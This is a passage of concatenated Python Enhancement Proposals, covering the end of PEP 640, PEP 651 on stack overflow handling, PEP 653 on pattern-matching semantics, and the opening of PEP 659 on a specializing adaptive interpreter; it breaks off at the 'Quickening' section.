# Exception handling:
try: ...
except Exception as ?: ...
# With blocks:
with open(f) as ?: ...
Some of these may seem to make sense from a consistency point of view, but
practical uses are limited and dubious. Type annotations on "?" and
using it with except and with do not seem to make any sense. In the
reference implementation, except is not supported (the existing syntax
only allows a name) but with is (by virtue of the existing syntax
supporting unpacking assignment).
Should this PEP be accepted even if pattern matching is rejected?
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Rejected | PEP 640 – Unused variable syntax | Standards Track | This PEP proposes new syntax for unused variables, providing a pseudo-name
that can be assigned to but not otherwise used. The assignment doesn’t
actually happen, and the value is discarded instead. |
PEP 651 – Robust Stack Overflow Handling
Author:
Mark Shannon <mark at hotpy.org>
Status:
Rejected
Type:
Standards Track
Created:
18-Jan-2021
Post-History:
19-Jan-2021
Table of Contents
Rejection Notice
Abstract
Motivation
Rationale
Specification
StackOverflow exception
RecursionOverflow exception
Decoupling the Python stack from the C stack
Other Implementations
C-API
Py_CheckStackDepth()
Py_EnterRecursiveCall()
PyLeaveRecursiveCall()
Backwards Compatibility
Security Implications
Performance Impact
Implementation
Monitoring C stack consumption
Making Python-to-Python calls without consuming the C stack
Rejected Ideas
Open Issues
Copyright
Rejection Notice
This PEP has been rejected by the Python Steering Council.
Abstract
This PEP proposes that Python should treat machine stack overflow differently from runaway recursion.
This would allow programs to set the maximum recursion depth to fit their needs
and provide additional safety guarantees.
If this PEP is accepted, then the following program will run safely to completion:
import sys

sys.setrecursionlimit(1_000_000)

def f(n):
    if n:
        f(n-1)

f(500_000)
and the following program will raise a StackOverflow, without causing a VM crash:
import sys

sys.setrecursionlimit(1_000_000)

class X:
    def __add__(self, other):
        return self + other

X() + 1
Motivation
CPython uses a single recursion depth counter to prevent both runaway recursion and C stack overflow.
However, runaway recursion and machine stack overflow are two different things.
Allowing machine stack overflow is a potential security vulnerability, but limiting recursion depth can prevent the
use of some algorithms in Python.
Currently, if a program needs to deeply recurse it must manage the maximum recursion depth allowed,
hopefully managing to set it in the region between the minimum needed to run correctly and the maximum that is safe
to avoid a memory protection error.
By separating the checks for C stack overflow from checks for recursion depth,
pure Python programs can run safely, using whatever level of recursion they require.
Rationale
CPython currently relies on a single limit to guard against potentially dangerous stack overflow
in the virtual machine and to guard against runaway recursion in the Python program.
This is a consequence of the implementation which couples the C and Python call stacks.
By breaking this coupling, we can improve both the usability of CPython and its safety.
The recursion limit exists to protect against runaway recursion; the integrity of the virtual machine should not depend on it.
Similarly, recursion should not be limited by implementation details.
Specification
Two new exception classes will be added, StackOverflow and RecursionOverflow, both of which will be
sub-classes of RecursionError.
StackOverflow exception
A StackOverflow exception will be raised whenever the interpreter or builtin module code
determines that the C stack is at or nearing a limit of safety.
StackOverflow is a sub-class of RecursionError,
so any code that handles RecursionError will handle StackOverflow.
RecursionOverflow exception
A RecursionOverflow exception will be raised when a call to a Python function
causes the recursion limit to be exceeded.
This is a slight change from current behavior which raises a RecursionError.
RecursionOverflow is a sub-class of RecursionError,
so any code that handles RecursionError will continue to work as before.
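For illustration, existing handlers keep working because both proposed classes inherit from RecursionError; a small sketch (the subclass names are the ones proposed by this PEP and do not exist in current CPython):

def probe(n=0):
    return probe(n + 1)

try:
    probe()
except RecursionError as exc:
    # Today this catches RecursionError itself; under this PEP it would
    # equally catch the proposed RecursionOverflow (Python-level limit)
    # and StackOverflow (C stack nearly exhausted) subclasses.
    print(type(exc).__name__, "caught after deep recursion")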
Decoupling the Python stack from the C stack
In order to provide the above guarantees and ensure that any program that worked previously
continues to do so, the Python and C stack will need to be separated.
That is, calls to Python functions from Python functions, should not consume space on the C stack.
Calls to and from builtin functions will continue to consume space on the C stack.
The size of the C stack will be implementation defined, and may vary from machine to machine.
It may even differ between threads. However, there is an expectation that any code that could run
with the recursion limit set to the previous default value will continue to run.
Many operations in Python perform some sort of call at the C level.
Most of these will continue to consume C stack, and will result in a
StackOverflow exception if uncontrolled recursion occurs.
Other Implementations
Other implementations are required to fail safely regardless of what value the recursion limit is set to.
If the implementation couples the Python stack to the underlying VM or hardware stack,
then it should raise a RecursionOverflow exception when the recursion limit is exceeded,
but the underlying stack does not overflow.
If the underlying stack overflows, or is near to overflow,
then a StackOverflow exception should be raised.
C-API
A new function, Py_CheckStackDepth(), will be added, and the behavior of Py_EnterRecursiveCall() will be modified slightly.
Py_CheckStackDepth()
int Py_CheckStackDepth(const char *where)
will return 0 if there is no immediate danger of C stack overflow.
It will return -1 and set an exception, if the C stack is near to overflowing.
The where parameter is used in the exception message, in the same fashion
as the where parameter of Py_EnterRecursiveCall().
Py_EnterRecursiveCall()
Py_EnterRecursiveCall() will be modified to call Py_CheckStackDepth() before performing its current function.
Py_LeaveRecursiveCall()
Py_LeaveRecursiveCall() will remain unchanged.
Backwards Compatibility
This feature is fully backwards compatible at the Python level.
Some low-level tools, such as machine-code debuggers, will need to be modified.
For example, the gdb scripts for Python will need to be aware that there may be more than one Python frame
per C frame.
C code that uses the Py_EnterRecursiveCall(), PyLeaveRecursiveCall() pair of
functions will continue to work correctly. In addition, Py_EnterRecursiveCall()
may raise a StackOverflow exception.
New code should use the Py_CheckStackDepth() function, unless the code wants to
count as a Python function call with regard to the recursion limit.
We recommend that “python-like” code, such as Cython-generated functions,
use Py_EnterRecursiveCall(), but other code use Py_CheckStackDepth().
Security Implications
It will no longer be possible to crash the CPython virtual machine through recursion.
Performance Impact
It is unlikely that the performance impact will be significant.
The additional logic required will probably have a very small negative impact on performance.
The improved locality of reference from reduced C stack use should have some small positive impact.
It is hard to predict whether the overall effect will be positive or negative,
but it is quite likely that the net effect will be too small to be measured.
Implementation
Monitoring C stack consumption
Gauging whether a C stack overflow is imminent is difficult, so we need to be conservative.
We need to determine a safe bound for the stack, which is not something possible in portable C code.
For major platforms, the platform specific API will be used to provide an accurate stack bounds.
However, for minor platforms some amount of guessing may be required.
While this might sound bad, it is no worse than the current situation, where we guess that the
size of the C stack is at least 1000 times the stack space required for the chain of calls from
_PyEval_EvalFrameDefault to _PyEval_EvalFrameDefault.
This means that in some cases the amount of recursion possible may be reduced.
In general, however, the amount of recursion possible should be increased, as many calls will use no C stack.
Our general approach to determining a limit for the C stack is to get an address within the current C frame,
as early as possible in the call chain. The limit can then be guessed by adding some constant to that.
Making Python-to-Python calls without consuming the C stack
Calls in the interpreter are handled by the CALL_FUNCTION,
CALL_FUNCTION_KW, CALL_FUNCTION_EX and CALL_METHOD instructions.
The code for those instructions will be modified so that when
a Python function or method is called, instead of making a call in C,
the interpreter will setup the callee’s frame and continue interpretation as normal.
The RETURN_VALUE instruction will perform the reverse operation,
except when the current frame is the entry frame of the interpreter
when it will return as normal.
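The effect of decoupling can be sketched in pure Python by analogy: a naturally recursive algorithm rewritten to keep its own explicit stack is bounded only by memory, not by the native call stack. This is only an analogy for the interpreter change described above, not the actual CPython implementation:

def depth(obj):
    # The explicit work list plays the role of the decoupled "Python
    # stack": no native recursion happens, however deeply obj is nested.
    best, work = 0, [(obj, 1)]
    while work:
        node, d = work.pop()
        best = max(best, d)
        if isinstance(node, list):
            work.extend((child, d + 1) for child in node)
    return best

# A list nested 100_000 levels deep, far beyond the default recursion
# limit, measured without overflowing any stack.
nested = []
for _ in range(100_000):
    nested = [nested]
print(depth(nested))   # 100001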
Rejected Ideas
None, as yet.
Open Issues
None, as yet.
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Rejected | PEP 651 – Robust Stack Overflow Handling | Standards Track | This PEP proposes that Python should treat machine stack overflow differently from runaway recursion. |
PEP 653 – Precise Semantics for Pattern Matching
Author:
Mark Shannon <mark at hotpy.org>
Status:
Draft
Type:
Standards Track
Created:
09-Feb-2021
Post-History:
18-Feb-2021
Table of Contents
Abstract
Motivation
Precise semantics
Improved control over class matching
Robustness
Efficient implementation
Rationale
Specification
Additions to the object model
Semantics of the matching process
Preamble
Capture patterns
Wildcard patterns
Literal Patterns
Value Patterns
Sequence Patterns
Mapping Patterns
Class Patterns
Nested patterns
Guards
Non-conforming special attributes
Values of the special attributes for classes in the standard library
Legal optimizations
Security Implications
Implementation
Possible optimizations
Splitting evaluation into lanes
Sequence patterns
Mapping patterns
Summary of differences between this PEP and PEP 634
Rejected Ideas
Using attributes from the instance’s dictionary
Lookup of __match_args__ on the subject not the pattern
Combining __match_class__ and __match_container__ into a single value
Deferred Ideas
Having a separate value to reject all class matches
Code examples
Copyright
Abstract
This PEP proposes a semantics for pattern matching that respects the general concept of PEP 634,
but is more precise, easier to reason about, and should be faster.
The object model will be extended with two special (dunder) attributes, __match_container__ and
__match_class__, in addition to the __match_args__ attribute from PEP 634, to support pattern matching.
Both of these new attributes must be integers and __match_args__ is required to be a tuple of unique strings.
With this PEP:
The semantics of pattern matching will be clearer, so that patterns are easier to reason about.
It will be possible to implement pattern matching in a more efficient fashion.
Pattern matching will be more usable for complex classes, by allowing classes some more control over which patterns they match.
Motivation
Pattern matching in Python, as described in PEP 634, is to be added to Python 3.10.
Unfortunately, PEP 634 is not as precise about the semantics as it could be,
nor does it allow classes sufficient control over how they match patterns.
Precise semantics
PEP 634 explicitly includes a section on undefined behavior.
Large amounts of undefined behavior may be acceptable in a language like C,
but in Python it should be kept to a minimum.
Pattern matching in Python can be defined more precisely without losing expressiveness or performance.
Improved control over class matching
PEP 634 delegates the decision over whether a class is a sequence or mapping to collections.abc.
Not all classes that could be considered sequences are registered as subclasses of collections.abc.Sequence.
This PEP allows them to match sequence patterns, without the full collections.abc.Sequence machinery.
PEP 634 privileges some builtin classes with a special form of matching, the “self” match.
For example the pattern list(x) matches a list and assigns the list to x.
By allowing classes to choose which kinds of pattern they match, other classes can use this form as well.
For example, using sympy, we might want to write:
# a*a == a**2
case Mul(args=[Symbol(a), Symbol(b)]) if a == b:
return Pow(a, 2)
This requires the sympy class Symbol to “self” match.
It is possible for sympy to support this pattern with PEP 634, but it is a bit tricky.
With this PEP it can be implemented very easily [1].
Robustness
With this PEP, access to attributes during pattern matching becomes well defined and deterministic.
This makes pattern matching less error prone when matching objects with hidden side effects, such as object-relational mappers.
Objects will have more control over their own deconstruction, which can help prevent unintended consequences should attribute access have side-effects.
PEP 634 relies on the collections.abc module when determining which patterns a value can match, implicitly importing it if necessary.
This PEP will eliminate surprising import errors and misleading audit events from those imports.
Efficient implementation
The semantics proposed in this PEP will allow efficient implementation, partly as a result of having precise semantics
and partly from using the object model.
With precise semantics, it is possible to reason about what code transformations are correct,
and thus apply optimizations effectively.
Because the object model is a core part of Python, implementations already handle special attribute lookup efficiently.
Looking up a special attribute is much faster than performing a subclass test on an abstract base class.
Rationale
The object model and special methods are at the core of the Python language. Consequently,
implementations support them well.
Using special attributes for pattern matching allows pattern matching to be implemented in a way that
integrates well with the rest of the implementation, and is thus easier to maintain and is likely to perform better.
A match statement performs a sequence of pattern matches. In general, matching a pattern has three parts:
Can the value match this kind of pattern?
When deconstructed, does the value match this particular pattern?
Is the guard true?
To determine whether a value can match a particular kind of pattern, we add the __match_container__
and __match_class__ attributes.
This allows the kind of a value to be determined in an efficient fashion.
Specification
Additions to the object model
The __match_container__ and __match_class__ attributes will be added to object.
__match_container__ should be overridden by classes that want to match mapping or sequence patterns.
__match_class__ should be overridden by classes that want to change the default behavior when matching class patterns.
__match_container__ must be an integer and should be exactly one of these:
0
MATCH_SEQUENCE = 1
MATCH_MAPPING = 2
MATCH_SEQUENCE is used to indicate that instances of the class can match sequence patterns.
MATCH_MAPPING is used to indicate that instances of the class can match mapping patterns.
__match_class__ must be an integer and should be exactly one of these:
0
MATCH_SELF = 8
MATCH_SELF is used to indicate that for a single positional argument class pattern, the subject will be used and not deconstructed.
Note
In the rest of this document, we will refer to the above values by name only.
Symbolic constants will be provided both for Python and C, and the values will
never be changed.
object will have the following values for the special attributes:
__match_container__ = 0
__match_class__ = 0
__match_args__ = ()
These special attributes will be inherited as normal.
If __match_args__ is overridden, then it is required to hold a tuple of unique strings. It may be empty.
Note
__match_args__ will be automatically generated for dataclasses and named tuples, as specified in PEP 634.
The pattern matching implementation is not required to check that any of these attributes behave as specified.
If the value of __match_container__, __match_class__ or __match_args__ is not as specified, then
the implementation may raise any exception, or match the wrong pattern.
Of course, implementations are free to check these properties and provide meaningful error messages if they can do so efficiently.
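As an illustration of these additions (a sketch only: current CPython does not consult __match_container__, so this has no effect under PEP 634 as implemented), a class could opt in to sequence matching like this:
MATCH_SEQUENCE = 1  # the symbolic constant described above

class Pair:
    # Under the proposed semantics this is enough for instances to match
    # sequence patterns such as `case [x, y]:`.
    __match_container__ = MATCH_SEQUENCE

    def __init__(self, first, second):
        self._items = (first, second)

    def __len__(self):
        return len(self._items)

    def __getitem__(self, index):
        return self._items[index]
Under PEP 634 as accepted, Pair would instead have to be registered as a collections.abc.Sequence subclass to match sequence patterns.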
Semantics of the matching process
In the following, all variables of the form $var are temporary variables and are not visible to the Python program.
They may be visible via introspection, but that is an implementation detail and should not be relied on.
The pseudo-statement FAIL is used to signify that matching failed for this pattern and that matching should move to the next pattern.
If control reaches the end of the translation without reaching a FAIL, then it has matched, and following patterns are ignored.
Variables of the form $ALL_CAPS are meta-variables holding a syntactic element, they are not normal variables.
So, $VARS = $items is not an assignment of $items to $VARS,
but an unpacking of $items into the variables that $VARS holds.
For example, with the abstract syntax case [$VARS]: and the concrete syntax case [a, b]:, $VARS would hold the variables (a, b),
not the values of those variables.
The pseudo-function QUOTE takes a variable and returns the name of that variable.
For example, if the meta-variable $VAR held the variable foo then QUOTE($VAR) == "foo".
All additional code listed below that is not present in the original source will not trigger line events, conforming to PEP 626.
Preamble
Before any patterns are matched, the expression being matched is evaluated:
match expr:
translates to:
$value = expr
Capture patterns
Capture patterns always match, so the irrefutable match:
case capture_var:
translates to:
capture_var = $value
Wildcard patterns
Wildcard patterns always match, so:
case _:
translates to:
# No code -- Automatically matches
Literal Patterns
The literal pattern:
case LITERAL:
translates to:
if $value != LITERAL:
FAIL
except when the literal is one of None, True or False,
when it translates to:
if $value is not LITERAL:
FAIL
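The identity comparison matters when the subject lies about equality. The following already behaves this way on Python 3.10 (PEP 634 specifies the same identity check for these three literals):
class Agreeable:
    def __eq__(self, other):
        return True            # claims equality with everything, including None

match Agreeable():
    case None:                 # compared with `is`, so the bogus __eq__ is never consulted
        outcome = "matched None"
    case _:
        outcome = "did not match None"

assert outcome == "did not match None"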
Value Patterns
The value pattern:
case value.pattern:
translates to:
if $value != value.pattern:
FAIL
Sequence Patterns
A pattern not including a star pattern:
case [$VARS]:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_SEQUENCE:
FAIL
if len($value) != len($VARS):
FAIL
$VARS = $value
Example: [2]
A pattern including a star pattern:
case [$VARS]:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_SEQUENCE:
FAIL
if len($value) < len($VARS):
FAIL
$VARS = $value # Note that $VARS includes a star expression.
Example: [3]
Mapping Patterns
A pattern not including a double-star pattern:
case {$KEYWORD_PATTERNS}:
translates to:
$sentinel = object()
$kind = type($value).__match_container__
if $kind != MATCH_MAPPING:
FAIL
# $KEYWORD_PATTERNS is a meta-variable mapping names to variables.
for $KEYWORD in $KEYWORD_PATTERNS:
$tmp = $value.get(QUOTE($KEYWORD), $sentinel)
if $tmp is $sentinel:
FAIL
$KEYWORD_PATTERNS[$KEYWORD] = $tmp
Example: [4]
A pattern including a double-star pattern:
case {$KEYWORD_PATTERNS, **$DOUBLE_STARRED_PATTERN}:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_MAPPING:
FAIL
# $KEYWORD_PATTERNS is a meta-variable mapping names to variables.
$tmp = dict($value)
if not $tmp.keys() >= $KEYWORD_PATTERNS.keys():
FAIL
for $KEYWORD in $KEYWORD_PATTERNS:
$KEYWORD_PATTERNS[$KEYWORD] = $tmp.pop(QUOTE($KEYWORD))
$DOUBLE_STARRED_PATTERN = $tmp
Example: [5]
Class Patterns
Class pattern with no arguments:
case ClsName():
translates to:
if not isinstance($value, ClsName):
FAIL
Class pattern with a single positional pattern:
case ClsName($VAR):
translates to:
$kind = type($value).__match_class__
if $kind == MATCH_SELF:
if not isinstance($value, ClsName):
FAIL
$VAR = $value
else:
As other positional-only class pattern
Positional-only class pattern:
case ClsName($VARS):
translates to:
if not isinstance($value, ClsName):
FAIL
$attrs = ClsName.__match_args__
if len($attrs) < len($VARS):
raise TypeError(...)
try:
for i, $VAR in enumerate($VARS):
$VAR = getattr($value, $attrs[i])
except AttributeError:
FAIL
Example: [6]
Class patterns with all keyword patterns:
case ClsName($KEYWORD_PATTERNS):
translates to:
if not isinstance($value, ClsName):
FAIL
try:
for $KEYWORD in $KEYWORD_PATTERNS:
$tmp = getattr($value, QUOTE($KEYWORD))
$KEYWORD_PATTERNS[$KEYWORD] = $tmp
except AttributeError:
FAIL
Example: [7]
Class patterns with positional and keyword patterns:
case ClsName($VARS, $KEYWORD_PATTERNS):
translates to:
if not isinstance($value, ClsName):
FAIL
$attrs = ClsName.__match_args__
if len($attrs) < len($VARS):
raise TypeError(...)
$pos_attrs = $attrs[:len($VARS)]
try:
for i, $VAR in enumerate($VARS):
$VAR = getattr($value, $attrs[i])
for $KEYWORD in $KEYWORD_PATTERNS:
$name = QUOTE($KEYWORD)
if $name in $pos_attrs:
raise TypeError(...)
$KEYWORD_PATTERNS[$KEYWORD] = getattr($value, $name)
except AttributeError:
FAIL
Example: [8]
Nested patterns
The above specification assumes that patterns are not nested. For nested patterns
the above translations are applied recursively by introducing temporary capture patterns.
For example, the pattern:
case [int(), str()]:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_SEQUENCE:
FAIL
if len($value) != 2:
FAIL
$value_0, $value_1 = $value
#Now match on temporary values
if not isinstance($value_0, int):
FAIL
if not isinstance($value_1, str):
FAIL
Guards
Guards translate to a test following the rest of the translation:
case pattern if guard:
translates to:
[translation for pattern]
if not guard:
FAIL
Non-conforming special attributes
All classes should ensure that the values of __match_container__, __match_class__
and __match_args__ follow the specification.
Therefore, implementations can assume, without checking, that the following are true:
__match_container__ == 0 or __match_container__ == MATCH_SEQUENCE or __match_container__ == MATCH_MAPPING
__match_class__ == 0 or __match_class__ == MATCH_SELF
and that __match_args__ is a tuple of unique strings.
Values of the special attributes for classes in the standard library
For the core builtin container classes __match_container__ will be:
list: MATCH_SEQUENCE
tuple: MATCH_SEQUENCE
dict: MATCH_MAPPING
bytearray: 0
bytes: 0
str: 0
Named tuples will have __match_container__ set to MATCH_SEQUENCE.
All other standard library classes for which issubclass(cls, collections.abc.Mapping) is true will have __match_container__ set to MATCH_MAPPING.
All other standard library classes for which issubclass(cls, collections.abc.Sequence) is true will have __match_container__ set to MATCH_SEQUENCE.
For the following builtin classes __match_class__ will be set to MATCH_SELF:
bool
bytearray
bytes
float
frozenset
int
set
str
list
tuple
dict
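For illustration, this is the “self” matching behavior those values describe; the example below already works this way on Python 3.10 under PEP 634:
match 5:
    case int(x):              # single positional class pattern, int "self" matches
        assert x == 5         # the subject itself is bound, no attribute is read

match "spam":
    case str(s) if s.startswith("sp"):
        assert s == "spam"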
Legal optimizations
The above semantics implies a lot of redundant effort and copying in the implementation.
However, it is possible to implement the above semantics efficiently by employing semantic preserving transformations
on the naive implementation.
When performing matching, implementations are allowed
to treat the following functions and methods as pure:
For any class supporting MATCH_SEQUENCE:
cls.__len__()
cls.__getitem__()
For any class supporting MATCH_MAPPING:
cls.get() (two-argument form only)
Implementations are allowed to make the following assumptions:
isinstance(obj, cls) can be freely replaced with issubclass(type(obj), cls) and vice-versa.
isinstance(obj, cls) will always return the same result for any (obj, cls) pair and repeated calls can thus be elided.
Reading any of __match_container__, __match_class__ or __match_args__ is a pure operation, and may be cached.
Sequences, that is any class for which __match_container__ == MATCH_SEQUENCE, are not modified by iteration, subscripting or calls to len().
Consequently, those operations can be freely substituted for each other where they would be equivalent when applied to an immutable sequence.
Mappings, that is any class for which __match_container__ == MATCH_MAPPING, will not capture the second argument of the get() method.
So, the $sentinel value may be freely re-used.
In fact, implementations are encouraged to make these assumptions, as it is likely to result in significantly better performance.
Security Implications
None.
Implementation
The naive implementation that follows from the specification will not be very efficient.
Fortunately, there are some reasonably straightforward transformations that can be used to improve performance.
Performance should be comparable to the implementation of PEP 634 (at time of writing) by the release of 3.10.
Further performance improvements may have to wait for the 3.11 release.
Possible optimizations
The following is not part of the specification,
but guidelines to help developers create an efficient implementation.
Splitting evaluation into lanes
Since the first step in matching each pattern is to check against the kind, it is possible to combine all the kind checks into a single multi-way branch at the beginning
of the match. The list of cases can then be duplicated into several “lanes” each corresponding to one kind.
It is then trivial to remove unmatchable cases from each lane.
Depending on the kind, different optimization strategies are possible for each lane.
Note that the body of the match clause does not need to be duplicated, just the pattern.
Sequence patterns
This is probably the most complex to optimize and the most profitable in terms of performance.
Since each pattern can only match a range of lengths, often only a single length,
the sequence of tests can be rewritten as an explicit iteration over the sequence,
attempting to match only those patterns that apply to that sequence length.
For example:
case []:
A
case [x]:
B
case [x, y]:
C
case other:
D
Can be compiled roughly as:
# Choose lane
$i = iter($value)
for $0 in $i:
break
else:
A
goto done
for $1 in $i:
break
else:
x = $0
B
goto done
for $2 in $i:
del $0, $1, $2
break
else:
x = $0
y = $1
C
goto done
other = $value
D
done:
Mapping patterns
The best strategy here is probably to form a decision tree based on the size of the mapping and which keys are present.
There is no point repeatedly testing for the presence of a key.
For example:
match obj:
case {"a": x, "b": y}:
W
case {"a": x, "c": y}:
X
case {"a": x, "b": _, "c": y}:
Y
case other:
Z
If the key "a" is not present when checking for case X, there is no need to check it again for Y.
The mapping lane can be implemented, roughly as:
# Choose lane
if len($value) == 2:
if "a" in $value:
if "b" in $value:
x = $value["a"]
y = $value["b"]
goto W
if "c" in $value:
x = $value["a"]
y = $value["c"]
goto X
elif len($value) == 3:
if "a" in $value and "b" in $value:
x = $value["a"]
y = $value["c"]
goto Y
other = $value
goto Z
Summary of differences between this PEP and PEP 634
The changes to the semantics can be summarized as:
Requires __match_args__ to be a tuple of strings, not just a sequence.
This makes pattern matching a bit more robust and optimizable as __match_args__ can be assumed to be immutable.
Selecting the kind of container patterns that can be matched uses cls.__match_container__ instead of
issubclass(cls, collections.abc.Mapping) and issubclass(cls, collections.abc.Sequence).
Allows classes to opt out of deconstruction altogether, if necessary, by setting __match_class__ = 0.
The behavior when matching patterns is more precisely defined, but is otherwise unchanged.
There are no changes to syntax. All examples given in the PEP 636 tutorial should continue to work as they do now.
Rejected Ideas
Using attributes from the instance’s dictionary
An earlier version of this PEP used only attributes from the instance’s dictionary when matching a class pattern, if __match_class__ was the default value.
The intent was to avoid capturing bound methods and other synthetic attributes. However, this also meant that properties were ignored.
For the class:
class C:
def __init__(self):
self.a = "a"
@property
def p(self):
...
def m(self):
...
Ideally we would match the attributes “a” and “p”, but not “m”.
However, there is no general way to do that, so this PEP now follows the semantics of PEP 634.
Lookup of __match_args__ on the subject not the pattern
An earlier version of this PEP looked up __match_args__ on the class of the subject and
not the class specified in the pattern.
This has been rejected for a few reasons:
* Using the class specified in the pattern is more amenable to optimization and can offer better performance.
* Using the class specified in the pattern has the potential to provide better error reporting in some cases.
* Neither approach is perfect, both have odd corner cases. Keeping the status quo minimizes disruption.
Combining __match_class__ and __match_container__ into a single value
An earlier version of this PEP combined __match_class__ and __match_container__ into a single value, __match_kind__.
Using a single value has a small advantage in terms of performance,
but is likely to result in unintended changes to container matching when overriding class matching behavior, and vice versa.
Deferred Ideas
The original version of this PEP included the match kind MATCH_POSITIONAL and special method
__deconstruct__ which would allow classes full control over their matching. This is important
for libraries like sympy.
For example, using sympy, we might want to write:
# sin(x)**2 + cos(x)**2 == 1
case Add(Pow(sin(a), 2), Pow(cos(b), 2)) if a == b:
return 1
It is possible for sympy to support the positional patterns with current pattern matching,
but it is tricky. With these additional features it can be implemented easily [9].
This idea will feature in a future PEP for 3.11.
However, it is too late in the 3.10 development cycle for such a change.
Having a separate value to reject all class matches
In an earlier version of this PEP, there was a distinct value for __match_class__ that allowed classes to not match any class
pattern that would have required deconstruction. However, this would become redundant once MATCH_POSITIONAL is introduced, and
would complicate the specification for an extremely rare case.
Code examples
[1]
class Symbol:
__match_class__ = MATCH_SELF
[2]
This:
case [a, b] if a is b:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_SEQUENCE:
FAIL
if len($value) != 2:
FAIL
a, b = $value
if not a is b:
FAIL
[3]
This:
case [a, *b, c]:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_SEQUENCE:
FAIL
if len($value) < 2:
FAIL
a, *b, c = $value
[4]
This:
case {"x": x, "y": y} if x > 2:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_MAPPING:
FAIL
$tmp = $value.get("x", $sentinel)
if $tmp is $sentinel:
FAIL
x = $tmp
$tmp = $value.get("y", $sentinel)
if $tmp is $sentinel:
FAIL
y = $tmp
if not x > 2:
FAIL
[5]
This:
case {"x": x, "y": y, **z}:
translates to:
$kind = type($value).__match_container__
if $kind != MATCH_MAPPING:
FAIL
$tmp = dict($value)
if not $tmp.keys() >= {"x", "y"}:
FAIL
x = $tmp.pop("x")
y = $tmp.pop("y")
z = $tmp
[6]
This:
case ClsName(x, y):
translates to:
if not isinstance($value, ClsName):
FAIL
$attrs = ClsName.__match_args__
if len($attrs) < 2:
FAIL
try:
x = getattr($value, $attrs[0])
y = getattr($value, $attrs[1])
except AttributeError:
FAIL
[7]
This:
case ClsName(a=x, b=y):
translates to:
if not isinstance($value, ClsName):
FAIL
try:
x = $value.a
y = $value.b
except AttributeError:
FAIL
[8]
This:
case ClsName(x, a=y):
translates to:
if not isinstance($value, ClsName):
FAIL
$attrs = ClsName.__match_args__
if len($attrs) < 1:
raise TypeError(...)
$positional_names = $attrs[:1]
try:
x = getattr($value, $attrs[0])
if "a" in $positional_names:
raise TypeError(...)
y = $value.a
except AttributeError:
FAIL
[9]
class Basic:
__match_class__ = MATCH_POSITIONAL
def __deconstruct__(self):
return self._args
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Draft | PEP 653 – Precise Semantics for Pattern Matching | Standards Track | This PEP proposes a semantics for pattern matching that respects the general concept of PEP 634,
but is more precise, easier to reason about, and should be faster. |
PEP 659 – Specializing Adaptive Interpreter
Author:
Mark Shannon <mark at hotpy.org>
Status:
Draft
Type:
Informational
Created:
13-Apr-2021
Post-History:
11-May-2021
Table of Contents
Abstract
Motivation
Rationale
Performance
Implementation
Overview
Quickening
Adaptive instructions
Specialization
Ancillary data
Example families of instructions
LOAD_ATTR
LOAD_GLOBAL
Compatibility
Costs
Memory use
Comparing memory use to 3.10
Security Implications
Rejected Ideas
Storing data caches before the bytecode.
References
Copyright
Abstract
In order to perform well, virtual machines for dynamic languages must
specialize the code that they execute to the types and values in the
program being run. This specialization is often associated with “JIT”
compilers, but is beneficial even without machine code generation.
A specializing, adaptive interpreter is one that speculatively specializes
on the types or values it is currently operating on, and adapts to changes
in those types and values.
Specialization gives us improved performance, and adaptation allows the
interpreter to rapidly change when the pattern of usage in a program alters,
limiting the amount of additional work caused by mis-specialization.
This PEP proposes using a specializing, adaptive interpreter that specializes
code aggressively, but over a very small region, and is able to adjust to
mis-specialization rapidly and at low cost.
Adding a specializing, adaptive interpreter to CPython will bring significant
performance improvements. It is hard to come up with meaningful numbers,
as it depends very much on the benchmarks and on work that has not yet happened.
Extensive experimentation suggests speedups of up to 50%.
Even if the speedup were only 25%, this would still be a worthwhile enhancement.
Motivation
Python is widely acknowledged as slow.
Whilst Python will never attain the performance of low-level languages like C,
Fortran, or even Java, we would like it to be competitive with fast
implementations of scripting languages, like V8 for JavaScript or LuaJIT for
Lua.
Specifically, we want to achieve these performance goals with CPython to
benefit all users of Python including those unable to use PyPy or
other alternative virtual machines.
Achieving these performance goals is a long way off, and will require a lot of
engineering effort, but we can make a significant step towards those goals by
speeding up the interpreter.
Both academic research and practical implementations have shown that a fast
interpreter is a key part of a fast virtual machine.
Typical optimizations for virtual machines are expensive, so a long “warm up”
time is required to gain confidence that the cost of optimization is justified.
In order to get speed-ups rapidly, without noticeable warmup times,
the VM should speculate that specialization is justified even after a few
executions of a function. To do that effectively, the interpreter must be able
to optimize and de-optimize continually and very cheaply.
By using adaptive and speculative specialization at the granularity of
individual virtual machine instructions,
we get a faster interpreter that also generates profiling information
for more sophisticated optimizations in the future.
Rationale
There are many practical ways to speed-up a virtual machine for a dynamic
language.
However, specialization is the most important, both in itself and as an
enabler of other optimizations.
Therefore it makes sense to focus our efforts on specialization first,
if we want to improve the performance of CPython.
Specialization is typically done in the context of a JIT compiler,
but research shows specialization in an interpreter can boost performance
significantly, even outperforming a naive compiler [1].
There have been several ways of doing this proposed in the academic
literature, but most attempt to optimize regions larger than a
single bytecode [1] [2].
Using larger regions than a single instruction requires code to handle
de-optimization in the middle of a region.
Specialization at the level of individual bytecodes makes de-optimization
trivial, as it cannot occur in the middle of a region.
By speculatively specializing individual bytecodes, we can gain significant
performance improvements without anything but the most local,
and trivial to implement, de-optimizations.
The closest approach to this PEP in the literature is
“Inline Caching meets Quickening” [3].
This PEP has the advantages of inline caching,
but adds the ability to quickly de-optimize making the performance
more robust in cases where specialization fails or is not stable.
Performance
The speedup from specialization is hard to determine, as many specializations
depend on other optimizations. Speedups seem to be in the range 10% - 60%.
Most of the speedup comes directly from specialization. The largest
contributors are speedups to attribute lookup, global variables, and calls.
A small, but useful, fraction is from improved dispatch such as
super-instructions and other optimizations enabled by quickening.
Implementation
Overview
Any instruction that would benefit from specialization will be replaced by an
“adaptive” form of that instruction. When executed, the adaptive instructions
will specialize themselves in response to the types and values that they see.
This process is known as “quickening”.
Once an instruction in a code object has executed enough times,
that instruction will be “specialized” by replacing it with a new instruction
that is expected to execute faster for that operation.
Quickening
